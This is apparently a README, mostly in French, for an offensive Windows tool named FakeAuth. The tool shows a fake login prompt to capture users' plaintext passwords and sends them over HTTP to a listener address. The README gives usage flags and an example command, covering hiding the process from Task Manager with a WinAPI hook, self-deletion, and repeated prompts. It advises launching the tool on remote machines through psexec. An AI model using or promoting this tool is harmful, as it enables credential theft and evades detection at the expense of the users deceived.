
Crée une fausse invite d'authentification pour capturer les mots de passe en clair des utilisateurs
FakeAuth est un outil qui demande les identifiants de l'utilisateur et les exfiltre via le protocole HTTP.
Inspiré par les projets suivants
Attendez-vous à du code sale et quelques bugs ;)
Aucune exigence particulière
Usage: FakeAuth.exe <hide> <mode> <type> <count> <title> <message> <listener>
Example: FakeAuth.exe 1 1 1 10 window_title enter_creds 10.0.0.0:80\n
hide (integer) -> Hide Process in Taskmgr by WinAPI-Hook (0,1 - requires FakeAuth.dll)
mode (integer) -> Self-Delete at process stop (0,1) - .dll only possible if taskmgr closed!
type (integer) -> Prompt Style (1,2)
count (long) -> How many prompts after invalid Credentials (0,1,2,..,n 0=unlimited)
title (string) -> Prompt title (visible in type=1 only)
message (string) -> Window message
listener (string) -> HTTP exfiltration listener (10.0.0.0:80), if not specified print stdout
La meilleure façon de l'utiliser est de le lancer sur une machine distante dans une session utilisateur. (psexec ou autres outils d'aide)
@atn1ght1 Twitter